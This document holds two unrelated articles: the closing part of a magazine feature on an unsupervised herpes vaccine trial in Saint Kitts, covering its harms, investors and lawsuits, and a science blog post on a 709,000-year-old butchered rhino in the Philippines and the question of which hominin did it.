In June 2016, Erkelens arrived on the tiny island of Saint Kitts, which was quiet in the summer. Rational Vaccines had set up shop in a house high above a turquoise bay. One room became a makeshift medical office. There, Erkelens’ blood was drawn and her temperature taken. Then, as Halford looked on, a physician administered the injection. “We all had high hopes,” she recalls.

Initially, Erkelens’ only reaction was a walloping welt, which she had been told to expect and which seemed more of a curiosity to her than anything else. It was also a kind of badge. Before coming to Saint Kitts, Erkelens had avoided talking about her woes, except with potential partners. But on the island it was easy to spot other Americans who had also flown down for the clinical trial. “How do you miss another person with a giant red mark on the back of their leg when there’s no one else around?” In many ways, the trip felt like a group vacation.

Erkelens spent about five days on the island and recalls afternoons lounging on the beach, drinking beers at the bar, and exploring the island, where vervet monkeys ambled down from the hills. In the evenings, Fernandez sometimes paid for seafood dinners and drinks out of his own pocket. Participants had been flying to the island since March, receiving injections on a staggered schedule. Fernandez had been there for much of the time. When Erkelens returned home, she was already looking forward to her next island jaunt. She even planned to bring her 11-year-old son to Saint Kitts and stay between her second and third shots so he, too, could enjoy a “big, beachy vacation.”

In July, however, when Erkelens and her son arrived in Saint Kitts for her second shot, things did not go so well. This time she experienced an intense herpes outbreak after the injection, along with severe aches and pains, numbness and tingling in her arms and legs, shooting sensations, and “crazy, crazy shaking.” Halford had warned that she might feel flu-like symptoms, but this went far beyond that. By the time her symptoms started setting in, however, the other trial participants and researchers were leaving the island.


A little more than a week later, Erkelens sent frantic messages to Halford telling him how sick she was. “That’s when he called me,” she says. “He was really angry,” insisting, she says, that the symptoms were caused not by the vaccine but by a mosquito-borne virus called chikungunya. But he called back and offered to discuss her symptoms. (Erkelens says she later tested negative for chikungunya.)

In early August, Erkelens called Halford in distress from Saint Kitts, where she had remained for several weeks. Halford was in Portland, Oregon. He had flown there to ask a herpes expert named Terri Warren to join the board of Rational Vaccines. Warren, who was trained as a nurse practitioner and ran a sexual-health clinic in Portland for decades, has served as an investigator on more than 100 clinical trials, mostly involving herpes. She and Halford had worked together previously, but as he sat at her kitchen counter and described the experiment already under way in Saint Kitts, she grew increasingly alarmed. “There were no protections for these people,” she says. “There was no one watching over the conduct of this trial.”

While US companies frequently pursue clinical research abroad, often to save money, they virtually never do so without oversight from some kind of institutional review board, which tries to ensure that the potential benefits of an experiment outweigh the risks to participants. IRBs review every aspect of a trial: the script researchers use to recruit participants, the entry criteria for the study, the wording of the informed-consent document, the protocol for administering the drug or vaccine, and the rules for record keeping and reporting adverse events. These norms were established in response to historic abuses like the Tuskegee study, in which, over the course of 40 years, researchers observed how syphilis affected African American men without fully explaining what they were studying and without treating them even after an effective cure became available. Part of the idea of having a review board, though, is that even well-meaning researchers can lack perspective on their own work and require a third party to set them straight.

With mounting agitation, Warren grilled Halford on the kinds of issues an IRB might care about: Where did this vaccine come from? Who manufactured it? How was it shipped? How had he made sure that it was free from contaminants? Halford did not have satisfying answers. Warren also wanted to know how he had screened trial participants and was disturbed to learn that he had included people with two different strains of herpes virus, HSV-1 and HSV-2. The vaccine contained a live form of ­HSV-2, so the risks to individuals who only had HSV-1 were potentially higher. “I mean,” Warren told me, “what was he thinking?”

“There were no protections for these people. There was no one watching over the conduct of this trial ... I mean, what was he thinking?”

Compounding Warren’s concerns was Halford’s approach to data collection. He relied on questionnaires that participants filled out regarding their symptoms. Warren felt that the self-reports could potentially be influenced by a desire to please the researchers, especially since personal relationships had developed on an isolated island. “There was a lot of socializing with the investigators and the guy from Hollywood,” Warren says. “They’d sit around at the bar and drink and talk, and that’s just not appropriate.”

And then there was Halford’s casual approach to adverse events. When he admitted to Warren that some participants were having bad reactions to the vaccine, she asked, “Well, what are you going to do about that? How are you going to follow them?” His response, she says: “We removed them from the trial.” But that solves nothing, Warren told him. It leaves research subjects vulnerable and doesn’t answer crucial questions about the vaccine. “That’s not how you do it,” she told him. “You continue them in the trial and you follow them” because you want to know what the vaccine does.

Throughout the two-and-a-half-hour conversation, Warren felt she made little headway with Halford. “I wouldn’t describe him as belligerent, but he was not introspective in any way,” she says. “Just defensive.” She told him she wanted nothing to do with the clinical trial or the company. (Rational Vaccines declined to comment on Warren’s account.)

In early August, when Halford returned to Saint Kitts to oversee another round of injections, he asked Erkelens to meet him, Fernandez, and the doctor who administered the injections at a coffee shop. She still felt acutely ill, and as she approached the meeting with her son in tow, she was anxious that her symptoms would not be taken seriously. She also worried about letting Halford down, knowing how much he’d invested in the vaccine. Almost as soon as the conversation started, Erkelens says, Fernandez reminded her that she had signed a legal document acknowledging that the vaccine carried risks. It seemed her relationship with Rational Vaccines had shifted: “I was no longer their friend,” she says. “I was a foe.” (Fernandez denies that he brought up the informed-consent document and says that the company’s primary concern was to address Erkelens’ symptoms.)

Halford was not well. “He looked like he might throw up or pass out,” Erkelens says. At one point, she says, he shot her a sympathetic look and brought her and her son outside, where they could talk alone. As they walked along the road, in the direction of Erkelens’ hotel, Halford told her that he wanted to draw her blood again and try to understand why she’d become so ill; she could decide if she wanted the third injection. He had “a very big heart,” says Erkelens, who agreed to provide another blood sample. But she was afraid to continue with the vaccine. “I’m convinced the third shot would have killed me,” she says. “I felt like I was 100 years old.”

Halford’s cancer was taking an increasing toll. When Melanie picked him up at the airport in August, at the end of the clinical trial, he was seeing double and couldn’t drive. She later learned that he had suffered a seizure in Saint Kitts but had kept it from her, not wanting her to worry.

Racing against time, Halford wrote up the results of the Saint Kitts trial. He reported that 17 out of 20 subjects completed the three-injection series and described, on average, a “3.1-fold reduction in their frequency of herpes-symptomatic days.” For one participant, Halford also presented blood test results, which seemed to indicate a greater range of antibodies to the herpes virus after the vaccine than before. Nowhere in the manuscript did Halford provide data on the three participants who did not complete the trial, nor did he refer to adverse events beyond welts at the injection site.

When Halford submitted the manuscript to a peer-reviewed journal called Future Virology, the response was scorching. In reviews later obtained and posted online by Kaiser Health News, one scientist argued that “neither safety nor efficacy has been demonstrated by the data presented” and described the paper as “partly a vision, partly science, and partly wishful thinking.” The reviewers also came down hard on the lack of documented oversight: “Who is giving the immunizations in Saint Kitts and who is following them medically when they return to the US? Where is the clinical protocol based? Is this an end run around the FDA?” The manuscript was rejected.


If Halford failed to win approval from academic peers, he struck gold with investors. Earlier that year, Fernandez says, an angel investor named Paul Bohm, who had cofounded a hackerspace called Metalab and had Silicon Valley ties, reached out to Rational Vaccines and offered to put the company in touch with venture capitalists. Drawing on these connections, Fernandez spent months pitching the research. In April 2017, at a symposium at Southern Illinois University, Halford stood in an auditorium and described the long arc of his research. A former managing director of Credit Suisse named Bart Madden was in the audience, and he was enthralled. “He’s got a patch on his eye, he can’t hear out of one ear, he’s all messed up, but he gets up there for 20 minutes,” Madden says. “I felt like I was watching history being made, just like the smallpox cure with [Edward] Jenner.” Madden later invested $750,000, Fernandez told me. (Bohm did not respond to requests for an interview, and Madden declined to confirm or comment on the size of his investment.)

Madden, who retired from Credit Suisse in 2003, is an author and policy adviser to the conservative-libertarian Heartland Institute. He focuses on market-based solutions to public policy issues. In 2010 he wrote a book called Free to Choose Medicine, which argues that the FDA’s risk-averse approach to drug approval gets in the way of innovation and keeps life-saving medicines off the market. He first heard about Halford in early 2017, when a documentary filmmaker contacted him for an interview about Halford’s research and free-to-choose medicine. In Madden’s eyes, Halford fit the part of the brilliant outsider tangling with the scientific establishment.

Madden also took note that Peter Thiel, the legendary early investor in Facebook, was interested in Rational Vaccines. Thiel is known for his contrarianism and for taking aim at regulations and norms. A libertarian, he has criticized the FDA, calling the agency too restrictive and questioning whether an innovation like the polio vaccine could be achieved today.

“It caught my attention that Peter Thiel had done an incredible amount of due diligence on this,” Madden says. (Fernandez says he was first introduced to Jason Camm, the chief medical officer of Thiel Capital, by Paul Bohm, in early 2017. Camm was present at the April symposium, according to Fernandez, but Thiel was not.)

“I had to take a chance. Dr. Bill was dying. Nobody wanted to speak up, so I was like, ‘I’ll do it.’ ”

Madden also was moved by the testimony of a trial participant named Rich Mancuso, who attended the symposium. Mancuso has red hair and a puckish smile. He was working as an exterminator in New Jersey when he first met Halford online. He had been infected with herpes for more than 20 years, and though the symptoms waxed and waned, he experienced outbreaks as often as twice a month on his genitals and face. Mancuso told Madden about the humiliation of living with inflamed facial sores and the financial toll of paying for antiviral medicines. Dating was nearly impossible, and one rejection in particular brought him to the verge of suicide. Since receiving three shots of Halford’s vaccine, however, he had intervals of several months without the blistering sores. In gratitude, Mancuso chose to speak publicly to make his support more credible. “I had to take a chance,” he told me. “Dr. Bill was dying. Nobody wanted to speak up, so I was like, ‘I’ll do it.’ ”

With strong interest from investors—and at least one public success story—the company’s fortunes appeared to be ascendant. Halford’s health, however, was spiraling downward. By May 2017, it was no longer possible for him to work. And by early June, it was clear that he was close to death.

Halford had a jade necklace that he wore at all times, “like a talisman, to remind him to seize the day,” Melanie says. He got it a couple of years after his diagnosis, on a family trip to New Zealand. On June 22, he placed the necklace on his nightstand; when Melanie saw it there, she realized it was his way of saying, “I’m giving this up now.”

In August, two months after Halford’s death, the company received a total of $7 million from investors, Fernandez says, including $4 million from Thiel funds. At nearly the same time, however, Kaiser Health News broke the story that Halford had carried out a clinical trial with no guidance from the FDA or an institutional review board. The dean of Southern Illinois University’s School of Medicine had once referred to Halford as a “genius,” and the school had promoted his vaccine work on its website. But when details of the Saint Kitts research emerged, the university quickly distanced itself, saying that the institution was unaware of the trial’s oversight issues until after the work was done.

The university has acknowledged that there were serious problems with Halford’s work, and its medical school has halted all herpes simplex virus research. A spokesperson confirmed that “the government is conducting an investigation, and we are fully cooperating.”

Rational Vaccines is trying to weather the storm. As CEO, Fernandez is now charting a new course for the company, leaning on a recently hired chief technical officer as well as his investors. Madden says he first learned of the hotel-room injections and lack of oversight in Saint Kitts from news reports and admits he is troubled by what he heard. At the same time, “I don’t want to give opinions about this scientist that I revere,” he says, referring to Halford. “Was it done the right way? No.” But he said that now the company would comply with “the highest standards of gathering data.” Fernandez says Thiel Capital is also encouraging Rational Vaccines to conduct Phase I trials to follow FDA protocols. Camm, the chief medical officer at Thiel Capital, is “really one of the driving forces behind this whole thing,” Fernandez says. “If it were up to him, we’d be at the FDA already. I’m the one saying, ‘Let me get all the ducks in a row.’ ” (Neither Camm nor Thiel responded to numerous requests for interviews.)

The US market is lucrative and large, and “if you want to sell a treatment in the US, you have to play by US rules,” says Greely, of Stanford Law School. “I don’t care how libertarian you are.”

That doesn’t mean that the company will have an easy time with the FDA, which will likely ask to see all the data from Saint Kitts, as well as the lab notes for the animal studies. “The FDA will go back and look at the records, and if they’re not in order, they can’t be used,” says Robert Califf, a former commissioner of the agency. Still, if the company can convince the agency that the vaccine looks promising in animals—and that it is prepared to follow the rules—the agency is likely to allow further research. The FDA’s goal is not to punish, Califf says, speaking generally. “If there’s a good product and a bad company, the role of the FDA is to help get the good product through the system.” (The FDA declined to comment.)

Of course, more often than not, products that seem exciting in preclinical work fail in subsequent rounds of testing. Plenty of potential herpes vaccines, both preventive and therapeutic, have disappointed researchers in late-stage animal testing or in clinical trials over the years. “I think collectively we’ve all thrown the kitchen sink” at herpes efforts, says Clark, of Genocea. “It’s a hard virus, it really is.”

For months after she received the injections in Saint Kitts, Erkelens struggled to take her son to school, then often lay in bed for the rest of the day, unable to move. She continues to experience relentless tremors and intermittent nerve pain. “Nobody knows what’s going on,” she says.

Trial participants who felt better after the vaccination have a different concern: future access to the vaccine, both for themselves and others who are suffering. Rich Mancuso says he has not had an outbreak in more than a year but worries that if his symptoms do return, he won’t be able to get a booster shot—an option that Halford discussed with him. Carolyn says her symptoms disappeared for more than two years but “slowly started creeping back.” Now she gets occasional nerve pain, lasting a few minutes. “Most of the time it’s bearable, but I have been woken up in the middle of the night a few times as it got severe.”

Erkelens has hired a lawyer and is suing Rational Vaccines in state court for negligence and lack of informed consent. (Her lawyer argues that the document she signed before the trial did not fully represent the risks of the vaccine.) One other trial participant and one person who received hotel-room injections from Halford in 2013 have also filed suit against the company. (Rational Vaccines declined to comment on any legal proceedings.)

Before Halford died, Erkelens says, he called her “over and over and over” to see how she was doing. Halford always tried to understand the pain of the participants in his study; his empathy was part of what drew them to him. Yet it was perhaps his own suffering that made him blind to the larger implications of his actions. In what felt like the final insult, Erkelens said she had to reveal her identity in order to proceed with the lawsuit. It was an agonizing choice. Herpes had always felt like a mark of dishonor, and now it threatened to stain her public reputation as well. In the days after she filed the lawsuit, she set the wheels in motion to change her name.


Amanda Schaffer (@abschaffer) is a science writer based in Brooklyn, New York.




Hominin head-scratcher: who butchered this rhino 709,000 years ago?

Researchers say cut and percussion marks on a rhino suggest a hominin presence in the Philippines more than 700,000 years ago, ten times earlier than previously known. (Credit: Ingicco et al. 2018, doi: 10.1038/s41586-018-0072-8)

More than 700,000 years ago, in what’s now the north end of the Philippines, a hominin (or a whole bunch of them) butchered a rhino, systematically cracking open its bones to access the nutritious marrow within, according to a new study.

There’s just one problem: The find is more than ten times older than any human fossil recovered from the islands, and our species hadn’t even evolved that early.

Okay, so, maybe it was an archaic hominin, you’re thinking, maybe Homo erectus or some other now-extinct species. But there’s a problem with that line of thought, too.

According to the conventional view in paleoanthropology, only our species, Homo sapiens, had the cognitive capacity to construct watercraft. And to reach the island where the rhino was found, well, like Chief Brody says, “you’re gonna need a bigger boat.”

So who sucked the marrow from the poor dead rhino’s bones? It’s a whodunit with the final chapter yet to be written.

A single foot bone that’s about 67,000 years old is currently the oldest human fossil found in the Philippines (fun fact: the bone was found in Callao Cave, not far from Kalinga, the site of today’s discovery).

For more than half a century, however, some paleoanthropologists have hypothesized that hominins reached the archipelago much earlier. The pro-early presence camp has cited stone tools and animal remains originally excavated separately in the mid-20th century, but critics have noted there’s no direct association between the tools and bones, and the finds have lacked robust dating.

The larger obstacle in the eyes of the anti-early presence camp is all wet.

At numerous times in our recent history, geologically speaking, falling sea levels have exposed land surfaces now underwater, connecting islands and even continents to each other. The land bridge of Beringia is perhaps the most famous, joining what’s now Alaska with Russia at several points in time.

Land bridges were a thing in the broad span of geography between China, Southeast Asia and Australia, too.

An example of how much land can be exposed during periods of sea level drop. A team of researchers not involved in today’s study created this map in 2015 as a paleogeographical reconstruction of Palawan Island, in the Philippines. The site mentioned in the new research is from the northern part of Luzon, top center of the map. (Credit Robles, Emil, et al. “Late Quaternary sea-level changes and the palaeohistory of Palawan Island, Philippines.” The Journal of Island and Coastal Archaeology 10.1 (2015): 76-96.)

These lost land bridges made it possible for animals — including humans and other members of our hominin family — to expand into places that are now island nations, such as Indonesia. But although the Philippine archipelago once had more real estate, several of its islands were never joined to the mainland. And that’s where today’s mystery begins.

Stones and Bones

Researchers working at a site in the northern part of the island of Luzon report the discovery of 57 stone tools found with more than 400 animal bones, including the mostly complete remains of a rhino (the now-extinct Rhinoceros philippinensis, a poorly known species… having a specimen that’s about 75 percent complete is an achievement in and of itself).

Using the electron-spin resonance method on its tooth enamel, the team established that the rhino was about 709,000 years old. Thirteen of its bones, according to the study’s authors, showed signs of butchering, including cuts and “percussion marks” on both humeri (forelimb bones), which is typical of smashing open a bone to access the marrow.

Alas, none of the bones found belonged to a hominin, which could have not only told us the butcher’s identity but also confirmed that butchering took place.

If you’re thinking it sounds kind of familiar to read a Dead Things post about apparent stone tools beside an animal that appears to have been butchered at a time and place out of sync with the human evolution timeline, well, you’re not wrong.

You may recall, about a year ago, the not-insignificant hullabaloo that erupted over claims that a hominin had processed a mastodon carcass in what’s now Southern California 130,000 years ago — more than 110,000 years before humans arrived on the continent, according to the conventional timeline. The skeptical pushback about the Californian find continues, most recently in February in Nature, and the claim is unlikely to be taken seriously unless a hominin fossil turns up.

Today’s discovery at Kalinga is in many ways just as convention-busting, though the tools at the site appear more obviously shaped by a hominin than those at the California site. Let’s accept that Kalinga is indeed a butchering site, where at least one hominin processed the carcass of at least one animal. Then the question becomes: which hominin?

The Unusual Suspects

There is no evidence that H. sapiens is anywhere close to 700,000-plus years old. Although researchers are pushing back the timeline for our species’ emergence, even the most out-there genetic modeling places the dawn of our species at no more than 600,000 or so years ago.

What’s more, the oldest fossils classified as H. sapiens, from Jebel Irhoud in Morocco, are about 300,000 years old, and even calling them H. sapiens has been contentious. Although the face appears strikingly modern, the lower, more elongated shape of the Jebel Irhoud hominin brain case suggests that the individuals had a smaller cerebellum, lacking the advanced cognitive skills of modern humans.

In fact, only anatomically modern humans like you and me have ever scampered about boasting such big, fancy brains, with an oversized cerebellum that makes us stand out in a hominin lineup.

Because the cerebellum is linked to creativity and fine motor skills, among many other functions, the fact that Neanderthals and other hominins had smaller versions is one of the reasons many researchers believe only H. sapiens has been capable of complex processes…processes such as building a boat and getting it across water from Point A to Point B.

It’s reasonable to rule out H. sapiens at Kalinga, as well as Neanderthals and Denisovans, who also had not yet evolved.

But that leaves only archaic hominins, such as H. erectus or another as-yet-unknown member of our family tree, as candidates for crossing open water to Luzon. We won’t know for sure who enjoyed a snack of rhino marrow some 709,000 years ago until we find their bones.

The findings were published today in Nature.
